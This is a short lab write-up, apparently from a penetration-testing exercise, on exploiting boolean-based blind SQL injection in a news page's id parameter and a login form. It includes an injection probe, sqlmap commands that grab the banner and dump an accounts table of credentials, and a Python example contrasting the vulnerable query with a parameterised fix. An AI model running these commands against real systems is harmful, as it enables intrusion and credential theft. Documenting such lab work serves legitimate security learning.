The site has a simple news page, with each news item requested through an id=# parameter. First I enter an invalid ID but with a true OR clause, and the page returns content:
id=777 OR 'a'='a';
Then I change the OR clause to a false statement and the page returns no data, but no error either, so I'm happy it is susceptible to a (boolean-based blind) injection.
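As an added illustration, not code from the lab or this writeup: the query shape that produces exactly this true/false behaviour, next to a validated, parameterised version that does not. The table, rows and function names are constructed here on an in-memory SQLite database to stand in for the news table.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the news table (not the lab's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Welcome", "First post"), (2, "Update", "Second post")],
    )
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """The bug: the id parameter is concatenated straight into the SQL text.

    A true OR clause makes the WHERE match every row, a false one matches
    nothing, and neither raises an error, which is all a blind probe needs.
    """
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def validate_id(raw_id):
    """Return the id as an int, or None if it is not a plain positive integer."""
    if raw_id.isdigit():
        return int(raw_id)
    return None


def fetch_news_hardened(conn, raw_id):
    """The fix: validate the type, then bind the value instead of splicing it.

    Anything that is not a bare integer is rejected before the query runs,
    and the placeholder means the value can never be parsed as SQL.
    """
    news_id = validate_id(raw_id)
    if news_id is None:
        return []
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (news_id,)
    ).fetchall()
```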
First I try to just pull the banner to confirm sqlmap can access the DBMS:
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -p id --technique=B -b
[13:01:33] [INFO] retrieved: 5.5.38-0+wheezy1
back-end DBMS: MySQL >= 5.0.0
banner: '5.5.38-0+wheezy1'
Happy with that, I then pull the tables and finally the contents of the accounts table, which gives me multiple logins (clear-text passwords, tut tut). Note that as it's a lab I'm not concerned with noise or traffic, so I up the threads to 4.
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -p id --technique=B --tables
[13:03:26] [INFO] retrieved: 2
[13:03:29] [INFO] retrieved: information_schema
[13:04:15] [INFO] retrieved: awd
sudo sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -p id --technique=B -D awd -T accounts --dump --threads 4
Database: awd
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id | email | password | displayname |
+------+-----------------------------------------------------+-------------+-------------------+
There's a second form on the site with a login; similar tests show it's also vulnerable, so I run another attack. This time I run the login attempt through Burp Suite and export the proxy intercept as login.req to use with sqlmap, then run the following:
sudo sqlmap -r ./login.req -p username -b --dbms=mysql
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.38-0+wheezy1'